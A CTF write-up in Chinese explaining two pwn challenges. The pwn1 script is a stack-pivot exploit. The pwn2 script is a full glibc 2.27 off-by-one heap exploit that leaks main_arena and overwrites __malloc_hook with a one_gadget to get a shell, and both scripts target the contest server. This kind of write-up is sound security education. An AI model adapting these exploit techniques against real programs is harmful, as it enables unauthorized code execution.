长安“战疫”网络安全卫士守护赛wp
196082 慢慢好起来

总的来说比赛挺简单的,因为pwn2没遇到过所以调试花费的时间比较多,没来得及做pwn3,不过pwn3看了好像是存在任意地址写漏洞,猜测是修改exit的got表之类的,后面复现了再发(当然有可能因为太懒不发了)。

pwn1

add esp, 10h
mov eax, 0
mov ecx, [ebp+var_4]     ; ecx is reloaded from a local stack slot
leave
lea esp,[ecx-4]          ; esp is derived from ecx rather than left where `leave` put it
retn                     ; the return address is popped from wherever esp now points

注意程序不是从原本的位置开始ret就好了

from pwn import *

# Challenge binary; the commented-out process() line is the local-debug variant.
elf = ELF('./pwn1')
# r = process('./pwn1')
r = remote('113.201.14.253', 16088)

# Address inside ./pwn1 that the payload below uses as its return target.
shell_addr = 0x8048540

# The program prints an address after "Gift:"; strip the leading "0x" and parse as hex.
# Presumably the address of the input buffer (the name suggests so) - not verifiable here.
r.recvuntil(b'Gift:')
buf_addr = int(r.recvuntil(b'\n', drop=True)[2:], 16)

# Padding up to the slot that is loaded into ecx (see the disassembly above), then the
# value that slot gets, then the word that ends up being used as the return address.
payload = b'a'*(0x38-0x4)+p32(buf_addr+0x38+8)+p32(0)+p32(shell_addr)
# r.sendline(b'a'*(0x38+0x4))
r.sendline(payload)

r.interactive()

pwn2

off by one

程序在create的时候存在off by one漏洞,具体思路,覆盖下方chunk,释放chunk进入unsortedbin泄漏main_arena,释放chunk进入tcache修改到malloc上面的地址

from pwn import *

# Challenge binary and the libc shipped with it (glibc 2.27, per the filename).
elf = ELF('./pwn2')
libc = ELF('./libc-2.27.so')
# r = process('./pwn2')
r = remote('113.201.14.253', 16066)

context.log_level = 'debug'
# Offset within libc; it is turned into an absolute address once libc_base is known
# further down in the script.
one_gadget = 0x10a41c


def create(size, content):
    """Menu option 1: ask the service to allocate ``size`` bytes holding ``content``.

    Answers the three prompts (Choice, size, content) in order on the
    module-level tube ``r``. ``size`` is sent as its decimal string;
    ``content`` is sent as given (bytes).
    """
    exchange = (
        (b'Choice: ', b'1'),
        (b'size: ', str(size).encode('utf-8')),
        (b'content: ', content),
    )
    for prompt, answer in exchange:
        r.recvuntil(prompt)
        r.sendline(answer)


def edit(id, content):
    """Menu option 2: overwrite the note at index ``id`` with ``content``.

    Drives the prompts (Choice, idx, content) in order on the module-level
    tube ``r``; the index is sent as its decimal string.
    """
    exchange = (
        (b'Choice: ', b'2'),
        (b'idx: ', str(id).encode('utf-8')),
        (b'content: ', content),
    )
    for prompt, answer in exchange:
        r.recvuntil(prompt)
        r.sendline(answer)


def delete(id):
    """Menu option 3: free the note at index ``id``.

    Answers the Choice and idx prompts on the module-level tube ``r``;
    the index is sent as its decimal string.
    """
    exchange = (
        (b'Choice: ', b'3'),
        (b'idx: ', str(id).encode('utf-8')),
    )
    for prompt, answer in exchange:
        r.recvuntil(prompt)
        r.sendline(answer)


def show(id):
    """Menu option 4: ask the service to print the note at index ``id``.

    Answers the Choice and idx prompts on the module-level tube ``r``;
    reading the printed data is left to the caller.
    """
    exchange = (
        (b'Choice: ', b'4'),
        (b'idx: ', str(id).encode('utf-8')),
    )
    for prompt, answer in exchange:
        r.recvuntil(prompt)
        r.sendline(answer)


# gdb.attach(r)

# Step sequence for the off-by-one path described in the prose above.
# Trailing "# N" comments are the author's index bookkeeping for each note.
create(0x68, b'a'*0x68) # 0
create(0x100, b'a'*0x100) # 1
create(0x68, b'a'*0x68) # 2
create(0x88, b'a'*0x88) # 3
create(0xf8, b'a'*0xf8) # 4
create(0x88, b'a'*0x88) # 5

# delete(9)
delete(0)
create(0x68, b'a'*(0x68-0x8)+p64(0)+b'\x80') # 0
# let chunk 1 overlap chunk 2
delete(1)

create(0x170, b'a') # 1

delete(3)
create(0x88, b'a'*(0x88-0x8)+p64(0)+b'\x90') # 3
delete(4)
# chunk 4 overlaps chunk 5
create(0x180, b'a') # 4

for i in range(7):
    create(0x88, b'a')
for i in range(7):
    delete(12-i)
delete(5)
# send chunk 5 to the unsorted bin to obtain a main_arena address
edit(4, b'a'*(0xf8+0x8-1))
show(4)

# Parse the leaked pointer: pad the partial 8-byte value with zeros before unpacking.
r.recvuntil(b'aaaaaaaaaaaaaa\n')
main_arena_88 = u64(r.recvuntil(b'1.Add', drop=True).ljust(8, b'\x00'))
print(hex(main_arena_88))
# Keep the leaked page base and substitute the low 12 bits of __malloc_hook's offset.
malloc_hook = (main_arena_88 & 0xFFFFFFFFFFFFF000) + \
    (libc.symbols['__malloc_hook'] & 0xfff)
print(hex(malloc_hook))
libc_base = malloc_hook-libc.symbols['__malloc_hook']
one_gadget = libc_base+one_gadget

delete(2)
edit(1, b'a'*(0x100)+p64(0)+p64(0x70)+p64(malloc_hook-0x10)) # 2
# free chunk 2 into tcache and overwrite its fd pointer
create(0x68, b'a')
# gdb.attach(r)
create(0x68, b'a'*0x10+p64(one_gadget))
# overwrite malloc_hook

r.recvuntil(b'Choice: ')
r.sendline(b'1')
r.recvuntil(b'size: ')
r.sendline(b'1')
# getshell

r.interactive()

自己还是在常见的漏洞上面出现问题比如这次的off by one还有off by null都还没去了解,所以下来会去了解这方面的漏洞原理和利用方式。
